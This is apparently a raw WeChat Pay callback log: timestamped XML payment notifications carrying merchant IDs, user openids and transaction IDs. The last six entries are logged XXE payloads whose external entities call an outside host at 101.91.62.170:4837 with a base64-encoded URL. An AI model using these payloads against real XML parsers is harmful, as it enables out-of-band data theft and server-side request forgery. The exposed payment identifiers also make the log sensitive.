<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[n5aoevq087uz5uzaxa2ja11he68huqc4]]></nonce_str>
<openid><![CDATA[o6Iva5jJcv9AqpIV1ue2UZFgHHko]]></openid>
<out_trade_no><![CDATA[204220190606121736]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[6BE2BF9D97F24D20D18C9B9AB97762DB]]></sign>
<time_end><![CDATA[20190606121747]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000300201906061847857008]]></transaction_id>
</xml>
支付时间：2019-06-06 06:19:17
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1260]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[cem0nl5ikckz3fiyxa1mpv21t2wvzji3]]></nonce_str>
<openid><![CDATA[o6Iva5hZ4mT5OZDfBfB8lQawsxGU]]></openid>
<out_trade_no><![CDATA[341220190606121904]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[E0F52942715883259FD87F5617AB3A4F]]></sign>
<time_end><![CDATA[20190606121916]]></time_end>
<total_fee>1260</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000306201906064923248367]]></transaction_id>
</xml>
支付时间：2019-06-06 06:19:34
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1260]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[cem0nl5ikckz3fiyxa1mpv21t2wvzji3]]></nonce_str>
<openid><![CDATA[o6Iva5hZ4mT5OZDfBfB8lQawsxGU]]></openid>
<out_trade_no><![CDATA[341220190606121904]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[E0F52942715883259FD87F5617AB3A4F]]></sign>
<time_end><![CDATA[20190606121916]]></time_end>
<total_fee>1260</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000306201906064923248367]]></transaction_id>
</xml>
支付时间：2019-06-06 06:19:51
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[810]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[fnwytpc1n1f38gxr443m004kjmd4112w]]></nonce_str>
<openid><![CDATA[o6Iva5huViqhcHWrMx0mLubD349Q]]></openid>
<out_trade_no><![CDATA[716320190606121943]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8CBE12A1C1DED75F49BD5C3074E77CD4]]></sign>
<time_end><![CDATA[20190606121950]]></time_end>
<total_fee>810</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906063551800338]]></transaction_id>
</xml>
支付时间：2019-06-06 06:20:08
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[810]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[fnwytpc1n1f38gxr443m004kjmd4112w]]></nonce_str>
<openid><![CDATA[o6Iva5huViqhcHWrMx0mLubD349Q]]></openid>
<out_trade_no><![CDATA[716320190606121943]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8CBE12A1C1DED75F49BD5C3074E77CD4]]></sign>
<time_end><![CDATA[20190606121950]]></time_end>
<total_fee>810</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906063551800338]]></transaction_id>
</xml>
支付时间：2019-06-06 06:22:33
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1080]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[g5n9mlbst90ivizspdqi2adswtsme94j]]></nonce_str>
<openid><![CDATA[o6Iva5vfcekHlmRw0uC_DmW5Ptl8]]></openid>
<out_trade_no><![CDATA[853420190606122227]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[86D16B9DDE8ACEA59E7BCC3E4ECB8F39]]></sign>
<time_end><![CDATA[20190606122232]]></time_end>
<total_fee>1080</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906069345570858]]></transaction_id>
</xml>
支付时间：2019-06-06 06:22:49
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1080]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[g5n9mlbst90ivizspdqi2adswtsme94j]]></nonce_str>
<openid><![CDATA[o6Iva5vfcekHlmRw0uC_DmW5Ptl8]]></openid>
<out_trade_no><![CDATA[853420190606122227]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[86D16B9DDE8ACEA59E7BCC3E4ECB8F39]]></sign>
<time_end><![CDATA[20190606122232]]></time_end>
<total_fee>1080</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906069345570858]]></transaction_id>
</xml>
支付时间：2019-06-06 06:23:11
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[900]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[p3bpk76oewg66lno1zxqr1q6dmudizqw]]></nonce_str>
<openid><![CDATA[o6Iva5vfcekHlmRw0uC_DmW5Ptl8]]></openid>
<out_trade_no><![CDATA[788220190606122305]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B8ADDBAD06089250D9ED2C519C512BA2]]></sign>
<time_end><![CDATA[20190606122310]]></time_end>
<total_fee>900</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000301201906067505224807]]></transaction_id>
</xml>
支付时间：2019-06-06 06:23:27
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[900]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[p3bpk76oewg66lno1zxqr1q6dmudizqw]]></nonce_str>
<openid><![CDATA[o6Iva5vfcekHlmRw0uC_DmW5Ptl8]]></openid>
<out_trade_no><![CDATA[788220190606122305]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B8ADDBAD06089250D9ED2C519C512BA2]]></sign>
<time_end><![CDATA[20190606122310]]></time_end>
<total_fee>900</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000301201906067505224807]]></transaction_id>
</xml>
支付时间：2019-06-06 06:37:44
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[y3xwlf7geivb4sg2jny7jlyxttek70in]]></nonce_str>
<openid><![CDATA[o6Iva5lmt2b0ade1FVVm_zgEGAk8]]></openid>
<out_trade_no><![CDATA[216120190606123735]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[10CB5F476126C2F477AC1CF7A5A77EBD]]></sign>
<time_end><![CDATA[20190606123743]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906068868299000]]></transaction_id>
</xml>
支付时间：2019-06-06 06:38:00
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[y3xwlf7geivb4sg2jny7jlyxttek70in]]></nonce_str>
<openid><![CDATA[o6Iva5lmt2b0ade1FVVm_zgEGAk8]]></openid>
<out_trade_no><![CDATA[216120190606123735]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[10CB5F476126C2F477AC1CF7A5A77EBD]]></sign>
<time_end><![CDATA[20190606123743]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906068868299000]]></transaction_id>
</xml>
支付时间：2019-06-06 06:39:01
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[i9appm25ojzqj5zi9p7fbykfxsy71jv0]]></nonce_str>
<openid><![CDATA[o6Iva5pp4ciywoxrIhFln3V92f3Q]]></openid>
<out_trade_no><![CDATA[250120190606123852]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[2C9AC198ED20F3AF8C12009D4EE0E0CF]]></sign>
<time_end><![CDATA[20190606123900]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000291201906069756061954]]></transaction_id>
</xml>
支付时间：2019-06-06 06:39:04
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[720]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[cljv7x3wucj40fcc7ah55y9niq54ceqn]]></nonce_str>
<openid><![CDATA[o6Iva5nXLqwwXMR8wernRI6FF1Wg]]></openid>
<out_trade_no><![CDATA[454820190606123853]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[6A8546B9038028F79556989CEAE8233F]]></sign>
<time_end><![CDATA[20190606123903]]></time_end>
<total_fee>720</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906061377560870]]></transaction_id>
</xml>
支付时间：2019-06-06 06:39:16
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[i9appm25ojzqj5zi9p7fbykfxsy71jv0]]></nonce_str>
<openid><![CDATA[o6Iva5pp4ciywoxrIhFln3V92f3Q]]></openid>
<out_trade_no><![CDATA[250120190606123852]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[2C9AC198ED20F3AF8C12009D4EE0E0CF]]></sign>
<time_end><![CDATA[20190606123900]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000291201906069756061954]]></transaction_id>
</xml>
支付时间：2019-06-06 06:39:20
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[720]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[cljv7x3wucj40fcc7ah55y9niq54ceqn]]></nonce_str>
<openid><![CDATA[o6Iva5nXLqwwXMR8wernRI6FF1Wg]]></openid>
<out_trade_no><![CDATA[454820190606123853]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[6A8546B9038028F79556989CEAE8233F]]></sign>
<time_end><![CDATA[20190606123903]]></time_end>
<total_fee>720</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906061377560870]]></transaction_id>
</xml>
支付时间：2019-06-06 07:03:30
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[pzgodlz8fcmflomnr4kopve2yezm0umn]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[527620190606130319]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[EE2A330B7811FAEC79284ECC380B5193]]></sign>
<time_end><![CDATA[20190606130329]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000296201906065073679243]]></transaction_id>
</xml>
支付时间：2019-06-06 07:03:46
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[pzgodlz8fcmflomnr4kopve2yezm0umn]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[527620190606130319]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[EE2A330B7811FAEC79284ECC380B5193]]></sign>
<time_end><![CDATA[20190606130329]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000296201906065073679243]]></transaction_id>
</xml>
支付时间：2019-06-06 21:13:11
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">
%xxe;
]>
支付时间：2019-06-06 21:13:11
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">]>
<foo><value>&xxe;</value></foo>
支付时间：2019-06-06 21:28:31
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">
%xxe;
]>
支付时间：2019-06-06 21:28:31
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">]>
<foo><value>&xxe;</value></foo>
支付时间：2019-06-06 21:39:58
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">
%xxe;
]>
支付时间：2019-06-06 21:39:58
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019060703_614?aHR0cDovL21jY3lnb29kLmNvbS9vcmRlcmEucGhw">]>
<foo><value>&xxe;</value></foo>
